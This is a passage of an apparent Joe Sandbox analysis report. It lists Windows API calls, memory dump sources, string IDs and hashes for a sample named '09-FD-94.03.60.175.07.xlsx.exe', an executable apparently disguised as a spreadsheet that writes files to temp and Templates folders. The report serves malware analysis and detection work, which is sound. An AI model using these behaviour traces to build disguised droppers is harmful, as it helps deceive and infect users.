                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404C2D
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404C43
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C4F
                                                                            • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C61
                                                                            • DeleteObject.GDI32(00000000), ref: 00404C64
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C8F
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C9B
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D31
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D5C
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D70
                                                                            • GetWindowLongW.USER32(?,?), ref: 00404D9F
                                                                            • SetWindowLongW.USER32(?,?,00000000), ref: 00404DAD
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404DBE
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404EBB
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404F20
                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404F35
                                                                            • SendMessageW.USER32(?,?,00000000,?), ref: 00404F59
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F79
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404F8E
                                                                            • GlobalFree.KERNEL32(?), ref: 00404F9E
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405017
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004050C0
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004050CF
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004050EF
                                                                            • ShowWindow.USER32(?,00000000), ref: 0040513D
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00405148
                                                                            • ShowWindow.USER32(00000000), ref: 0040514F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 1638840714-813528018
                                                                            • Opcode ID: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
                                                                            • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                                            • Opcode Fuzzy Hash: f32dd1ad4cacf5c9a84244efbfcf101a6acffad7926e6f22680bdd12f93664ba
                                                                            • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                                            • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                                              • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,?,004047F1), ref: 0040571B
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                              • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                              • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                            • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                                            • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                            • String ID: 4Ct$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                                            • API String ID: 2246997448-1868779187
                                                                            • Opcode ID: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
                                                                            • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                                            • Opcode Fuzzy Hash: 412048f63ccbd6e0220628bf1a6179061b89ed4b5b9cf72557f1d92d188b8240
                                                                            • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                                            • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                                            • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                                            • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                                            APIs
                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                                            • GetDlgItem.USER32(?,?), ref: 004043E9
                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                                            • GetSysColor.USER32(?), ref: 00404417
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                                            • lstrlenW.KERNEL32(?), ref: 00404438
                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                                            • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                                            • SendMessageW.USER32(00000000), ref: 004044BA
                                                                            • GetDlgItem.USER32(?,?), ref: 004044E5
                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                                            • SetCursor.USER32(00000000), ref: 00404539
                                                                            • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                                            • SetCursor.USER32(00000000), ref: 0040455D
                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                                            • SendMessageW.USER32(?,00000000,00000000), ref: 0040459E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                            • String ID: 4Ct$Call$N$open
                                                                            • API String ID: 3615053054-1055102945
                                                                            • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                            • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                                            • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                                            • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                                            APIs
                                                                            • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                                            • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                                            • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                                              • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                              • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                            • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                                            • wsprintfA.USER32 ref: 00405CDE
                                                                            • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,?,00426588,?,?,?,?,?), ref: 00405D19
                                                                            • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405D28
                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                                            • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                            • String ID: %ls=%ls$NUL$[Rename]
                                                                            • API String ID: 1265525490-899692902
                                                                            • Opcode ID: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
                                                                            • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                                            • Opcode Fuzzy Hash: 2bc208171b49c92f6a46eb4eb130c3b065c9cc931763dc7ff993c44723f9a4f8
                                                                            • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                            • DrawTextW.USER32(00000000,00428200,000000FF,00000010,?), ref: 00401156
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                            • String ID: F
                                                                            • API String ID: 941294808-1304234792
                                                                            • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                            • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                            • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                            • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                            APIs
                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Char$Next$Prev
                                                                            • String ID: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                            • API String ID: 589700163-4098824426
                                                                            • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                            • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                                            • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                            • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,?,00000021), ref: 0040252F
                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,?,?,?,00000021), ref: 00402536
                                                                            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                                            • String ID: 8$C:\Users\user\AppData\Local\Temp\nseDB62.tmp$C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll
                                                                            • API String ID: 1453599865-3348084196
                                                                            • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                            • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                            • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                            • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                            • GetSysColor.USER32(00000000), ref: 0040423A
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                            • SetBkMode.GDI32(?,?), ref: 00404252
                                                                            • GetSysColor.USER32(?), ref: 00404265
                                                                            • SetBkColor.GDI32(?,?), ref: 00404275
                                                                            • DeleteObject.GDI32(?), ref: 0040428F
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                            • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                            • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                            • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                            APIs
                                                                              • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe,80000000,00000003), ref: 00405BB8
                                                                              • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                            • GlobalAlloc.KERNEL32(?,?), ref: 00402809
                                                                            • CloseHandle.KERNEL32(?), ref: 0040288F
                                                                              • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 00402825
                                                                            • GlobalFree.KERNEL32(?), ref: 0040285E
                                                                            • WriteFile.KERNEL32(?,00000000,?,?), ref: 00402870
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                              • Part of subcall function 00403062: SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                              • Part of subcall function 00403062: WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,?,00000004,00000000,00000000,?,?), ref: 00403115
